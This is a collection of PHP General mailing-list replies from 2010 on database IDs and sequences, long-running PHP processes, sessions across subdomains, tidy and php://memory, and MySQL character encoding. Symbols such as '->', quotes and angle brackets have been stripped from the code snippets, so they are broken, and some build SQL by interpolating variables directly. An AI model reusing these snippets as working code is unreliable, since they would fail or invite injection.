Op 2/13/10 11:36 AM, Eric Lee schreef: On Sat, Feb 13, 2010 at 6:55 PM, Jochem Maas joc...@iamjochem.com mailto:joc...@iamjochem.com wrote: Op 2/13/10 10:08 AM, Lester Caine schreef: Rene Veerman wrote: Hi. I'm looking for the most efficient way to insert several records and retrieve the auto_increment values for the inserted rows, while avoiding crippling concurrency problems caused by multiple php threads doing this on the same table at potentially the same time. Any clues are greatly appreciated.. I'm looking for the most sql server independent way to do this. Rene The 'correct' way of doing this is to use a 'sequence' which is something introduced in newer versions of the SQL standard. Firebird(Interbase) has had 'generators' since the early days (20+ years) and these provide a unique number which can then be inserted into the table. ADOdb emulates sequences in MySQL by creating a separate table for the insert value, so you can get the next value and work with it, without any worries. The only 'problem' is in situations were an insert is rolled back, a number is lost, but that is ACTUALLY the correct result, since there is no way of knowing that a previous insert WILL commit when several people are adding records in parallel. this is all true and correct ... but that doesn't answer the problem. how do you get the IDs of all the records that we're actually inserted in a multi-insert statement, even if you generate the IDs beforehand you have to check them to see if any one of the set INSERT VALUEs failed. @Rene: I don't think there is a really simple way of doing this in a RDBMS agnostic way, each RDBMS has it's own implementation - although many are alike ... and MySQL is pretty much the odd one out in that respect. it might require a reevaluation of the problem, to either determine that inserting several records at once is not actually important in terms of performance (this would depend on how critical the speed is to you and exactly how many records you're likely to be inserting in a given run) and whether you can rework the logic to do away with the requirement to get at the id's of the newly inserted records ... possibly by indentifying a unique indentifier in the data that you already have. one way to get round the issue might be to use a generated GUID and have an extra field which you populate with that value for all records inserted with a single query, as such it could function as kind of transaction indentifier which you could use to retrieve the newly inserted id's with one extra query: $sql = SELECT id FROM foo WHERE insert_id = '{$insertGUID}'; ... just an idea. Hi I would like to learn more correct way from both of you. May I ask what is a sequences ? it an RDBMS feature that offers a race-condition free method of retrieving a new unique identifier for a record you wish to enter, the firebird RDBMS that Lester mentions refers to this as 'generators'. to learn more I would suggest STW: http://lmgtfy.com/?q=sql+sequence Thanks ! Regards, Eric -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] optional object arguments to a function
Op 2/13/10 8:59 PM, Richard Quadling schreef: On 13 February 2010 10:07, Jochem Maas joc...@iamjochem.com wrote: ... Try stdClass. I guess you didn't read what I wrote then. If you know the class type, then that can be the type hint. You can also use func_get_args() to read all the parameters and type check them if there are MANY optional parameters. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Persistent flag in memory
Op 2/11/10 7:25 AM, Teus Benschop schreef: On Thu, 2010-02-11 at 06:46 +, Jochem Maas wrote: Op 2/11/10 6:34 AM, Teus Benschop schreef: On Thu, 2010-02-11 at 05:53 +, Jochem Maas wrote: whatever it is that your trying to do, it sounds like one of two things: 1. you have hosting that is unsuitable for your needs 2. you are tackling the problem incorrectly at any rate, as far I'm concerned, you should never have a long running php process via a web server. (obviously this is the point that someone posts a brilliant use case to prove me wrong ;-) could you detail what is is you're actuallt trying to do, chances are people have: a. got a better alternative b. already invented the particular wheel you're trying to build c. you really do need shell (or even just control panel) access to run a cron job What I am trying to achieve is to have a php script run once a minute and do a few tasks. There are some constraints: - Users usually install the php application on their local machines, be it Linux, Windows, or Macintosh. - The application is defined as needing zero-configuration, i.e. it runs out of the box. much too vague. no mention of a webserver ... zero-config and needing to install are somewhat mutually exclusive. I still have the feeling you're using the wrong tool for the job somehow, I may be wrong or drunk or both ;) Well, on the web server, this usually would be Apache, though one user indicated he would use some light httpd instead. Then, of course, yes, installation is not zero-config, but what I mean is that after installation no further configuration steps would be needed, e.g. if the user unpacks a tarball in the web root, it should run straightaway, or if he does 'apt-get install pacakge', no further configuration would be needed. I thought therefore that using visitors page requests was a clever way of initiating starting a php script. At the moment I've got the following code: if you're doing all this already in order to facilitate a multi-platform install ... why not go the extra yard and have the install process setup a cronjob (or scheduled task, launchd entry, etc, depending on platform)? $crontable = Database_Cron::getInstance (); if ($crontable-getFlag ()) die; $crontable-setFlag (); ignore_user_abort(true); set_time_limit(0); while(1) { $log = Database_Logs::getInstance(); $log-log (Minutely maintenance routine started); .. do some maintenance ... $log-log (Minutely maintenance routine finished); sleep(60); } of itself this seems like reasonable code, people argue about the finer details but you seem to be writing clean and tidy stuff. as such I still don't think this kind of thing belongs in a webserver process. I have recently been using daemontools (*nix/bsd compatible daemon management tools ... also used to manage qmail processes) to actually keep a long running / perpetual script running ... it's a very robust bit of kit which takes care of running just one instance of whatever and restarting it if it happens to die ... very nice, very simple, not available on Windows (AFAIK) ... and helps to keep this kind of management logic out of the actual php app. This uses the mechanism of a sql table in memory, which seems fine for the moment, since it is volatile and would disappear if the user restarts his laptop (or if the Amazon cloud reboots ;) - thus next time the user visits any page, this script would be restarted and do the maintenance till the user shuts down, and so on. I still have to look into the other mechanisms of creating a volatile flag. I think therefore, with my limited experience of PHP, that the above does well, though improvements are welcome. I'd think your php is an issue - little bit I've seen suggests you code diligently, it's merely the vehicle your using to have the script run perpetually that irks me. About scripts running forever, I don't see a problem here since most of the time it sleeps anyway, and when I look in my Ubuntu 9.10 laptop, doing ps ax gives 194 live processes already, so what does the one single extra sleeping process matter? in practice not much on a personal machine - nonetheless it's wasteful and technically a webserver is unneeded and creates another layer of complexity and overhead. it does seem rather brittle in terms of how you have it set up though. realise that your Ubuntu laptop is *probably* alot more stable, robust when running a never-ending Apache child [worker] process with mod_php loaded and executing ... I'd be quite confident that it would be stable and such on my Mac as well ... but a Windows machine, I wouldn't trust that to do it ... and keep running reliably (not from the script or the user POV) it's possible that it's the best you can do given the pratical circumstances of the users/maintainers of the installations ... but I hazard to say you 'wrapper' for you perpetual/reaccuring script *might* be a sub-optimal setup
Re: [PHP] Persistent flag in memory
Op 2/11/10 3:48 PM, Teus Benschop schreef: On Thu, 2010-02-11 at 09:27 -0500, Bastien Koert wrote: Could the app be converted to an Adobe AIR app or use PHPdock ( http://www.nusphere.com/products/phpdock.htm ) to run local? There are a number of security issues that surround installing a webserver and a database locally on a users machine that may become issues. It probably could be converted into a local application using these technologies, interesting technologies, by the way. The snag that will be hit though is that the application is licensed under the GPL v 3. Both tools you mention are closed source, I believe, and in addition I am not sure whether these work for Windows only, leaving Mac and Unix out. Will contributors to the applications be willing to buy the technologies? The security issues that you mention should be taken seriously. Teus. Adobe AIR is a free platform - incl. a free SDK, it runs on Win, Mac and Linux. AFAICT there is no restriction for developing GPL code that runs on the Air platform ... obviously you'll not be using PHP inside Air - javascript and/or actionscript would be the language in which the app logic is written. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Mysql statement works in phpmyadmin but not in php page
Op 2/11/10 10:51 PM, James McLean schreef: On Fri, Feb 12, 2010 at 8:27 AM, Joseph Thayne webad...@thaynefam.org wrote: Actually, the syntax is just fine. I personally would prefer it the way you mention, but there actually is nothing wrong with the syntax. The ,'$date1'. is not correct syntax, change it to ,'.$date.' My personal preference these days is to use Curly braces around variables in strings such as this, I always find excessive string concatenation such as is often used when building SQL queries hard to read, and IIRC there was performance implications to it as well (though I don't have access to concrete stats right now). In your case, the variable would be something like this: $query=INSERT INTO upload_history (v_id,hour,visits,date) VALUES ({$v_id}, {$hour}, {$visits}, '{$date}'); actually IIRC the engine compiles that to OpCodes that equate to: $query = 'INSERT INTO upload_history (v_id,hour,visits,date) VALUES ('.$v_id.', '.$hour.', '.$visits.', '\''.{$date}.'\')'; Much more readable and maintainable IMO. No need for the trailing semicolon in SQL that uses an API like you are using so save another char there too. Backticks around column names are not required and IMO again they just make the code hard to read. Just because phpMyAdmin uses them, doesn't mean we all need to. Cheers -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Persistent flag in memory
Op 2/11/10 5:42 AM, Teus Benschop schreef: Thank you for the hints given. I'll look into the various options given. The main reason for the need for a persistent flag in memory is that several installations where the PHP code would be deployed do not have access to crontab, so I am simulating crontab's functionality by letting a PHP script run forever. Page visits would start that script, but once the first visitor has started the script, next visitors would only start it if the script had died. Here is where the persistent flag is needed. Normally the script will never die unless at server reboot, or perhaps if some timeout limit has been exceeded. If I would touch a file in the filesystem as a flag, this would persist even after server reboot, so that means that my simulated crontab would never restart, since it looks like it runs. Teus. whatever it is that your trying to do, it sounds like one of two things: 1. you have hosting that is unsuitable for your needs 2. you are tackling the problem incorrectly at any rate, as far I'm concerned, you should never have a long running php process via a web server. (obviously this is the point that someone posts a brilliant use case to prove me wrong ;-) could you detail what is is you're actuallt trying to do, chances are people have: a. got a better alternative b. already invented the particular wheel you're trying to build c. you really do need shell (or even just control panel) access to run a cron job -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Persistent flag in memory
Op 2/11/10 6:34 AM, Teus Benschop schreef: On Thu, 2010-02-11 at 05:53 +, Jochem Maas wrote: whatever it is that your trying to do, it sounds like one of two things: 1. you have hosting that is unsuitable for your needs 2. you are tackling the problem incorrectly at any rate, as far I'm concerned, you should never have a long running php process via a web server. (obviously this is the point that someone posts a brilliant use case to prove me wrong ;-) could you detail what is is you're actuallt trying to do, chances are people have: a. got a better alternative b. already invented the particular wheel you're trying to build c. you really do need shell (or even just control panel) access to run a cron job What I am trying to achieve is to have a php script run once a minute and do a few tasks. There are some constraints: - Users usually install the php application on their local machines, be it Linux, Windows, or Macintosh. - The application is defined as needing zero-configuration, i.e. it runs out of the box. much too vague. no mention of a webserver ... zero-config and needing to install are somewhat mutually exclusive. I still have the feeling you're using the wrong tool for the job somehow, I may be wrong or drunk or both ;) Teus. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Warning?
Op 2/7/10 3:40 PM, tedd schreef: At 7:02 PM + 2/6/10, Jochem Maas wrote: Op 2/6/10 4:29 PM, tedd schreef: Hi: Has anyone encountered this warning? Warning: Unknown: Your script possibly relies on a session side-effect which existed until PHP 4.2.3. Please be advised that the session extension does not consider global variables as a source of data, unless register_globals is enabled. You can disable this functionality and this warning by setting session.bug_compat_42 or session.bug_compat_warn to off, respectively in Unknown on line 0 I seem to remember this happening before, but I don't remember the solution. As I remember, it wasn't really reporting an error, but something else. I just don't remember how I dealt with it before. I don't know how to set session.bug_compat_warn to off. doesn't this work?: ?php ini_set('session.bug_compat_warn', 0); ? otherwise you'll have to set it in php.ini (or a .htaccess file) IIRC it means your using session_register() .. which is depreciated and will be dropped in 5.3 ... AFAIK best practices is not to use this function but instead assing to the $_SESSION superglobal. Jochem: Two things: 1. Your solution worked. Setting -- ?php ini_set('session.bug_compat_warn', 0); ? -- worked!!! Thank you. np :) 2. I don't use session_register(). So has to be something else, but I don't know what that might be. Anyone have any ideas? pretty sure Shawn nailed it. Daniel? Cheers, tedd -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] pecl install geoip doesnt work. Warning: opendir(/var/tmp/pear-build-root/install-geoip-1.0.7//var/www/pear): failed to open dir: No such file or directory in PEAR/Builder.php on line 188
Op 2/8/10 4:35 AM, David Taveras schreef: /root/bin/pecl install geoip without giving it much thought ... try this: sudo /root/bin/pecl install geoip this is assuming you we're not running the command as root in the first place. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Thinking of moving to .NET because of standalone... any suggestions?
Op 2/3/10 6:09 PM, Ryan S schreef: Hey Guys, Coming from a C and Java background I just loved PHP and have been programming with it for years thanks in a large part to the kind people on this list... present and past (Immediately the name John Holmes comes to mind.. i hope the dude is well) but now I have have to leave PHP or split time between php and .NET for just one reason: .NET offers a way to run programs using the Windows GUI / stand alone executable There always was talk on the list about running php code as standalone, but since I had a long absence from the list sorry if I missed any new updates... but I'm hoping someone can offer a way to run php standalone executable. Before posting I always google, and the main results I have gotten so far is: priado blender and PHP-GTK but no way to kind of drag and drop what you need like visual studio (i dont know how to use it yet, but been reading) or some other visual development tool like visual basic. I need to make a few standalones programs that will run (mostly) on Windows... is there any other way that I have not found that i can use PHP instead of learning something new like .NET? I have resisted going the microsoft way for years.. looks like my luck has run out... I don't think that you'll get much else than Blender or PHP-GTK - so from that perspective I'd hazard a guess that your not going to be finding anything that will allow you use php for desktop development in the way you require. come to think of it M$ has been doing something to shoehorn PHP into the .NET env ... I have no idea whether this would be anything that could bare fruit for you, you'd have to google. as an alternative you might consider Adobe Flex Builder - you get WYSIWYG-ness, you can leverage javascript skills (by way of ActionScript) and it's runs on the AIR platform - so it's nice and desktoppy but with the added bonus of being cross-platform. just a thought. Thanks, Ryan -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] PHP Manual problems
Op 2/4/10 1:32 AM, clanc...@cybec.com.au schreef: Recently I have frequently found, especially in the morning (GMT 2200 - 0200), that I can open a bookmark in the manual, for example http://www.php.net/manual/en/ref.image.php. But if I then do a search of any type I get 'The page cannot be displayed'. I then cannot reach any page, including the one I originally opened. This morning, after some fiddling, I found that if I closed the browser, and re-opened it I could then see the original bookmark again, and link to some pages, but others would again crash the browser, as would all searches. I am using IE6, and have seen a message that I should update my browser, but only when the page is displaying properly. Firefox 3.5.5 immediately converted the above to http://au2.php.net/manual/en/ref.image.php. and then told me The manual page you are looking for (http://au2.php.net/manual/en/ref.image.php.) is not available on this server right now. there are stacks of mirrors. try one of: au.php.net tw.php.net tw2.php.net tn.php.net tn2.php.net sg.php.net sg2.php.net ... guessing those are closest to you. as for using IE6 ... WTF ... you do realise this is essentially a web developers mailing list right? Is this due to maintenance, or somesuch, or is it something in my system? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] database abstraction layer
Op 2/3/10 12:19 AM, Ashley Sheridan schreef: On Wed, 2010-02-03 at 00:21 +0100, Rene Veerman wrote: the auto_increment sytnax is not uniform across servers, is it? On Wed, Feb 3, 2010 at 12:11 AM, Ashley Sheridan a...@ashleysheridan.co.ukwrote: I saw it happen on a site that was getting only about 3000 hits a day. It just takes the right combination of circumstances and it all goes pear shaped. You really should get out of the habit of doing it. It is a MySQL only function. MSSQL has @@IDENTITY, not sure how other engines implement it. firebird does it via what they call 'generators', 2 seconds of searching shows postgres has this: CREATE TABLE tableName ( id serial PRIMARY KEY, name varchar(50) UNIQUE NOT NULL, dateCreated timestamp DEFAULT current_timestamp ); you can bet you ass that every other DB out there that's worth it's salt has atomic id incrementor functionality exposed in some way or other. @Rene: all that talk of maxId functions and random retries etc, etc, is complete pooh. don't do it, **please** use the proper tools provided by the DB in question. Thanks, Ash http://www.ashleysheridan.co.uk -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Magento shopping cart
Op 2/1/10 10:02 PM, Skip Evans schreef: Hey all, Anyone ever use the Magento shopping cart? Pluses, minuses, opinions? I have a client that is pretty adamant about using it, but I've found over just about any I've used I can do a better service to the client by writing them from scratch. It's easy and they always get exactly what they want. I see they seem to have a lot of plug ins, but I think someone just told him it is the best cart to use so he's sort of fixated on it. Like I said, I typically find I can custom write one with better results. I found xCart, for example, to contain some of the worst code I had ever seen and it turned me off to third party carts. I find the only time a custom solution is suitable is when there is a large budget and very specific requirements, which usually translates into atleast: 1. specialized discounting mechanisms 2. tight integration with a 'big' backend system (e.g. SAP, Siebel, etc) 3. custom data-related workflows I just spent some time looking at XCart for someone - seeing the frontend I figured the requested changes would be a piece fo cake, the reality is that making those changes was practically impossible and definitely not ecomonically viable. the XCart code is complete pants. I also took a dive into the Magento codebase, a quick perusal shows a well defined structure, tidy code, well commented, modular. looks very good really - learning curve is a bit steep but that's down to the fact that it's a very complete and sophicated package ... additionally there is a big, well organized community behind it ... I would hazard a guess and say that it's a very good bet. Skip -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] how do I use php://memory?
Op 1/30/10 1:35 AM, Mari Masuda schreef: Hello, I have a function that uses tidy to attempt to clean up a bunch of crappy HTML that I inherited. In order to use tidy, I write the crappy HTML to a temporary file on disk, run tidy, and extract and return the clean(er) HTML. The program itself works fine but with all of the disk access, it runs quite slowly. I saw on this page (http://www.php.net/manual/en/wrappers.php.php) that I could write to memory by using php://memory. Unfortunately, I could not quite get it to work. The problem is that in the below function, the code within the [[[if (file_exists($dirty_file_path))]]] does not get run if I change [[[$dirty_file_path]]] to php://memory. Has anyone ever successfully used php://memory before? If so, what can I do to use it in my code? Thank you. what does it matter that it runs slowly, run it once and be done with it? alternatively use the php tidy extension and avoid the file system and shelling out altogether. actually I'd imagine shelling out from a webserver process is the bottle neck and not saving/reading from the file system. lastly I don't suppose you've heard of /dev/shm ? and, er, no, I don't have experience with php://memory but you might try searching for other people's code: http://www.google.com/codesearch?q=php%3A%2F%2Fmemoryhl=enbtnG=Search+Code //== function cleanUpHtml($dirty_html, $enclose_text=true) { $parent_dir = /filesWrittenFromPHP/; $now = time(); $random = rand(); //save dirty html to a file so tidy can process it $dirty_file_path = $parent_dir . dirty . $now . - . $random . .txt; $dirty_handle = fopen($dirty_file_path, w); fwrite($dirty_handle, $dirty_html); fclose($dirty_handle); $cleaned_html = ; $start = 0; $end = 0; if (file_exists($dirty_file_path)) { exec(/usr/local/bin/tidy -miq -wrap 0 -asxhtml --doctype strict --preserve-entities yes --css-prefix \tidy\ --tidy-mark no --char-encoding utf8 --drop-proprietary-attributes yes --fix-uri yes . ($enclose_text ? --enclose-text yes : ) . $dirty_file_path . 2 /dev/null); $tidied_html = file_get_contents($dirty_file_path); $start = strpos($tidied_html, body) + 6; $end = strpos($tidied_html, /body) - 1; $cleaned_html = trim(substr($tidied_html, $start, ($end - $start))); } unlink($dirty_file_path); return $cleaned_html; } //== -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Sessions across subdomains
Op 1/30/10 2:25 AM, Ben Miller schreef: Hi, I've always thought that session data was subdomain specific and would not carry over between http://www.mydomain.com and https://secure.mydomain.com, but it seems to be working for me now. Can I rely on this and post from http://www.mydomain.com to https://secure.mydomain.com and simply pass a hidden input containing PHPSESSID, or do I need to pass each key=value pair that _SESSION contains at www. and reset them as _SESSION vars at secure. https://secure.mydomain.com ? 1. cookies are shared automatically on SUB domains, so if you set your cookie domain to example.com it will be available at both www.example.com and secure.example.com 2. cookies can have a HTTPS flag set which means they will not be shared with non-HTTPS connections. 3. DONT put the contents of $_SESSION on the wire. (given the question you're asking I'd hazard a guess you don't have the skills to sufficiently 4. google/read/search/learn about the security implications of sharing a cookie between HTTPS and non-HTTPS domains. 5. session_regenerate_id() - I would use this if you intend to pass session ids around, although it will probably give you a stack of problems in terms of usability (e.g. back button usage), actually I'd use it any time you log someone in or out or have a user perform a particularly sensitive action. 6. the $_SESSION will only be available on both sites if they are both on the same server and running with the same session ini settings (i.e. session save path, session name) - different servers could obviously be using a shared filesystem or an alternative session storage (e.g. memcached or database server). 7. consider not sharing the session - instead pass just the data that you need (e.g. shopping basket contents etc) and either including a hash of the data (which uses a secret string that is not included in the form/url/etc but that both servers/sites know about AND/OR using 2-way public key encryption on the data that you pass in between the servers/sites personally for higher end commercial sites I prefer to just to put everything on HTTPS solving all potential issues with sharing a cookie or data between nonHTTPS and HTTPS sites, and everything directly related ... the cost being extra overhead per request - but hardware is cheap and security is difficult to get exactly right. the biggest names on the web have [had] security loophopes/problems related to these issues, and they generally have tons of man power and some very clever/knowledgable people on their teams - which is to say: your chance (and mine for that matter) of not making any mistakes on this front are slimmer than theirs. Thanks in advance, Ben -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] In need of PHP to JS collapsable array printing routine?
Op 1/30/10 12:54 AM, Daevid Vincent schreef: I'm wondering if anyone has a PHP debug-type routine that will take a PHP array and output it to the web page, but make all the dimensions of the array collapsable, ideally showing each sub-key (or index) as the name to click to expand it again. I'm dealing with some rather huge datasets in multi-dimensional hashes and printing them out with a beautified print_r() is just not cutting it anymore. I need to collapse them down to wrap my head around them. Some of them have 6 or more dimensions! I use jQuery for JS if that helps (in case your routine requires that too). what everyone else said ... additionally check out the recent archives for posts by Rene Veerman ... his current pet project seems to be something that would be of interest you. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: 120 meg of json analyzed by the browser...
Op 1/28/10 5:03 PM, Rene Veerman schreef: Oh, i forgot to mention that firefox takes about a gigabyte of memory after having stalled at 200mb parsed in a 330mb document.. And despite using setTimeout(), firefox frequently freezes (for about 2 to 10 minutes), before updating the decoding-status display again. I'd really appreciate someone checking my non-eval() json parser-decoder to see if my code is at fault, or if i've triggered a firefox 'bug'. just guessing but I doubt you have a real issue in your parser-decoder, the memory used by firefox seems reasonable to my untrained eye - I'd guess that a factor 5 memory overhead is normal given the amount of abstraction involved in the browser doing it's thing. pretty cool what your trying to do - but, totally nuts of course :) I would think that you're only recourse really is to chunk the output of both the server and the browser so that you can, theoretically, page through the data structure in the browser ... might be totally inpractical, if not impossible. not to mention you likely to have to use file-based storage for the chunks of output on the server side to avoid running out of mem. hard problem! -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Migrating legacy code - changing session name
Op 1/26/10 9:25 AM, Rory McKinley schreef: Hello List A client has asked me to migrate a few scripts that have been running merrily under PHP4 to PHP5.2. Part of these scripts have integration with PHPMyAdmin using the single sign-on and so they make use of the following code : session_write_close(); session_name(blah); session_start(); Now, assuming that prior to session_write_close(), I have a session that (amongst other elements) contains the following: $_SESSION['a'] = (an instance of Object A) $_SESSION['b'] = (an instance of Object B) $_SESSION['c'] = (an instance of Object C) After session_start(), I have the following : $_SESSION['a'] = (an instance of Object C) $_SESSION['b'] = (an instance of Object C) $_SESSION['c'] = (an instance of Object C) sounds to me like the objects are a stored in a variable, each time the same variable that the var in question is assigned by reference (this is done in php4 code quite a bit so that objects that are passed around are not copied - which makes them useless in many instances) the following code mkight help you to understand what it is (that I think) is happening: // php4 compatible class class Foo { var $s; function Foo($s) { $this-s = $s; } }; $store = array(); $var = new Foo(A); $store[A] = $var; $var = new Foo(B); $store[B] = $var; $var = new Foo(C); $store[C] = $var; var_dump($store); This does not consistently happen, only under particular circumstances (it seems to be a certain set of elements in $_SESSION triggers it). For instance, if I unset $_SESSION['b'] * prior* to doing session_write_close() - the behaviour stops, and the elements are retained. Has anybody seen this before? Vital Stats: PHP5.2 Apache1.3 FastCGI Sessions are stored using PHP5's default session handling. Thanks in advance -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] importNode issue
highlight_string() function might be an easier route? Op 1/25/10 9:55 AM, Michael A. Peters schreef: I'm experiencing a slight problem with importNODE putting unwanted carriage returns in the the output. Here's my function: // syntax highlighting include_once('Text/Highlighter.php'); function syntaxHighlight($dom,$lang,$code) { $hl = Text_Highlighter::factory($lang); $out = $hl-highlight($code); //die($out); $tmpDOM = new DOMDocument('1.0','UTF-8'); $tmpDOM-loadXML($out); $foo = $tmpDOM-saveXML(); //die($foo); $nodeList = $tmpDOM-getElementsByTagName('div'); $impDIV = $nodeList-item(0); $returnDIV = $dom-importNode($impDIV,true); return $returnDIV; } -=- Here's my test: $code =?php . \n\n; $code .=require_once('/path/to/something'); . \n; $code .=function somefunc(\$myfoo,\$mybar) { . \n; $code .= \$myfoobar = \$myfoo . \$mybar; . \n; $code .= return \$myfoobar; . \n; $code .= } . \n; $code .=? . \n; $fooTest = syntaxHighlight($dom,'PHP',$code); -=- If I uncomment the die($out) - I get what I expect spit to the screen, view source shows code that will do what I want. If instead I uncomment die($foo) - I also get what I expect spit to screen. view source shows code that will do what I want. However, if the function is allowed to continue, the imported div has carriage returns between each and every /spanspan which of course completely breaks the browser display because they are inside a pre/pre node. Anyone know why importNode does this and how to fix it? The only (untried) solution I can think of is to replace each carriage return with a br / and every space with #160; and then replace the pre with a div class='monospace' or some such hackery before running loadXML() on it. But I would rather not do that. php 5.2.12 built against libxml 2.6.26 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Weird Array Issue...
Op 1/23/10 3:28 AM, Don Wieland schreef: Hi, I have defined a stored procedure in my mySQL DB and when I call the procedure in my mySQL browser it returns the CORRECT results: DROP PROCEDURE IF EXISTS `Get_OHC_Years`; DELIMITER $$ CREATE definer=`do...@`` PROCEDURE `Get_OHC_Years`() BEGIN SELECT (YEAR(ohc_Date)) as ohc_year FROM Office_Hours_Cuttoff GROUP BY YEAR(ohc_Date) ORDER BY YEAR(ohc_Date) ASC; END $$ It returns: -- ohc_year-- 2010 2009 2008 2007 I doubt it will return the values in the order you have shown. I was assuming this will return an array in my PHP when I call it: /** *Get All Office Hours Cut-off YEARS */ $db-next_result(); this call to next_result() seems strange. $years = $db-query(CALL Get_OHC_Years()) or die(Records not found.); $yRow = $years-fetch_array(); echo pre; print_r($yRow); echo /pre; But the result it returns on my page is: Array ( [0] = 2007 [ohc_year] = 2007 What am I missing? Thanks! the bit where you actually RTM or source? you seem to be assuming what the fetch_array() call does, not being able to tell exactly what kind of object $db is I'll hazard a guess that fetch_array() is a wrapper method for mysql_fetch_array() - you'd want mysql_fetch_assoc() instead, and you'll need to loop to fetch all the rows. maybe try something like: echo pre; while ($yRow = $years-fetch_assoc()) print_r($yRow); echo /pre; -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Enforce a constant in a class.
Op 1/22/10 4:55 PM, Richard Quadling schreef: 2010/1/22 Ashley Sheridan a...@ashleysheridan.co.uk Constants are there for things that should never change. If you ever need to change them, then whoever created the base class either didn't think things through properly, or you're not. Imagine a class that sets the value of π (as is the erstwhile example for constants) If further classes that implemented it were of a particular historical persuasion, then they might want to redefine the constant as just 3. It seemed like a good idea to the historical Roman Catholics at the time (it was defined as 3 in the Bible after all) but it doesn't make it the correct value (imagine the problems with volume calculations!) Constants are so called for a good reason! And in the class that I want to enforce the presence of the constant, it will be constant. I just want to enforce the presence. constants in interfaces are not meant for this. a class constant doesn't constitute an interface. I believe constants in interfaces are allowed purely because it is helpful to have them defined outside of the global space and somewhere where all implementors of said interface can realiably reference them. I would suggest you need to define some extra methods in your interface e.g. function getKillNotes(); function getKillTypeFlag(); -- - Richard Quadling Standing on the shoulders of some very clever giants! EE : http://www.experts-exchange.com/M_248814.html EE4Free : http://www.experts-exchange.com/becomeAnExpert.jsp Zend Certified Engineer : http://zend.com/zce.php?c=ZEND002498r=213474731 ZOPA : http://uk.zopa.com/member/RQuadling -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Foreign Characters Break in MySQL
Op 1/22/10 9:41 AM, Ashley Sheridan schreef: On Fri, 2010-01-22 at 03:47 +0100, Jochem Maas wrote: Op 1/22/10 2:28 AM, Ryan Park schreef: Forgot to reply all. You can see that it's in the middle of the sql statement. It looks fine here but some how it breaks during the query. ?php mysql_connect(localhost, adminID, password) or die(mysql_error()); echo Connected to MySQLbr /; mysql_select_db(databasename) or die(mysql_error()); echo Connected to Databasebr /; $sql = INSERT INTO xe_modules (module_srl, module, module_category_srl, layout_srl, menu_srl, site_srl, mid, skin, browser_title, description, is_default, content, open_rss, header_text, footer_text, regdate) VALUES ('135', 'bodex', '0', '53', '0', '0', 'free', 'xe_default', '자유게시판 ', '', 'N', '', 'Y', '', '', UNIX_TIMESTAMP());; you need to: 1. have some understanding of char encoding and character sets. 2. define you DB[tables] to use a collation that supports the stuff you want to enter. 3. you need to connect to the DB with a suitable charset (google 'SET NAMES') 4. you need to make sure the data you are putting into your queries is in that same charset. basically you need UTF8 - be prepared for some pain and a lot of reading in order to get to grips with these concepts, I've personally found that encoding, charsets et al are not the easiest things to one's head round. mysql_query($sql) or die(mysql_error()); mysql_close(); ? On 1/21/2010 5:19 PM, Jim Lucas wrote: Ryan Park wrote: Hello I'm currently trying to use PHP to insert foreign characters into one of the mysql database tables.mysql_query() worked seamlessly, but when I check the inserted data on phpMyAdmin it shows the foreign characters in broken letters, like this ì‹œíŒ- jibberish...The foreign characters show fine when I'm typing it out on my editor to code PHP, but it gets broken into unrecognizable symbols when put into mysql database columns. I tried to create the same thing this time through phpMyAdmin console and it worked great, the foreign characters showed correctly as they should.The column that I'm trying to put the foreign characters into is set as utf8_general_ci.I wish to use PHP to insert the data into the database because I'll be inserting massive amounts of them at once, so I just can't continue with this problem at hand. I'll greatly appreciate any help, thank you. _ Your E-mail and More On-the-Go. Get Windows Live Hotmail Free. http://clk.atdmt.com/GBL/go/196390709/direct/01/ How about showing a little of the insert code. ie: how you are gathering the data, how you are preping the data, and the actual insert statement. You're also forgetting one of the most important elements of this. If you're displaying the characters on a web page, chances are that you need to add a corresponding meta tag to inform the browser that the content is utf-8 meta http-equiv=content-type content=text/html; charset=UTF-8/ Otherwise the browser will attempt to guess from the first few characters of output, and because of the large headers in some websites, will guess completely wrong. that was point 4. in my original post, I'd also say that the META tag is a bit lame on it's own ... better off actually setting the proper content encoding HTTP header (and using the META tag as well to cover for dumb ass browsers) Thanks, Ash http://www.ashleysheridan.co.uk -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Enforce a constant in a class.
